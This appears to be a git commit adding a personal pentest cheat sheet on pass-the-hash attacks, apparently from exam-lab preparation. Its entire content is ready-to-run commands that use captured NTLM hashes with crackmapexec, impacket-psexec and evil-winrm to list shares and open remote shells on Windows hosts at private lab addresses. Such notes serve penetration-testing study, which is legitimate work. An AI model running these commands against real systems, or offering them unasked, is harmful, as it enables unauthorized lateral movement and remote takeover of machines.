first commit
This commit is contained in:
+11
@@ -0,0 +1,11 @@
|
||||
Pass-The-Hash [psexec, impacket, CME]
|
||||
|
||||
```sh
|
||||
- crackmapexec smb 192.168.154.171 -u 'ted' -d 'exam.com' -H ':31aa99ebd6ea4b6d07051acfd48efa35' --shares
|
||||
|
||||
- impacket-psexec -hashes ":d098fa8675acd7d26ab86eb2581233e5" exam.com/[email protected]
|
||||
# Try without DOMAIN NAME ALSO
|
||||
- impacket-psexec -hashes ":d098fa8675acd7d26ab86eb2581233e5" [email protected]
|
||||
|
||||
- evil-winrm -i 192.168.154.170 -u zensvc -H d098fa8675acd7d26ab86eb2581233e5
|
||||
```
|
||||
Reference in New Issue
Block a user